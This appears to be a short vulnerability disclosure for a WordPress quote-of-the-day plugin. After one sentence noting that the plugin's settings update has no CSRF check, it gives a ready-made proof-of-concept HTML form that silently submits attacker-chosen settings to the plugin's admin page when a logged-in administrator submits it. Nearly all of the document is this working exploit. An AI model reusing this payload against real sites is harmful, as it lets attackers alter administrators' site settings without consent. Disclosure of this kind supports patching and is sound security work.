The plugin is lacking any CSRF check when updating its settings, allowing attackers to make logged in administrators change them to arbitrary values.
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=shantz-wp-qotd.php" method="POST">
<input type="hidden" name="shantzWpQotdEnable" value="true" />
<input type="hidden" name="shantzWpQotdSrcBox" value="true" />
<input type="hidden" name="shantzWpQotdSrcFile" value="false" />
<input type="hidden" name="shantzWpQotdSeparator" value="" />
<input type="hidden" name="shantzWpQotdDb" value="Quote via CSRF" />
<input type="hidden" name="shantzWpQotdPattern" value="qottd" />
<input type="hidden" name="shantzWpQotdAddAuto" value="true" />
<input type="hidden" name="shantzWpQotdExcludePages" value="false" />
<input type="hidden" name="shantzWpQotdAddBottom" value="true" />
<input type="hidden" name="shantzWpQotdStaticTextBefore" value="" />
<input type="hidden" name="shantzWpQotdStaticTextAfter" value="" />
<input type="hidden" name="update_shantzWpQotdPluginSettings" value="Update Settings" />
<input type="submit" value="Submit request" />
</form>
</body>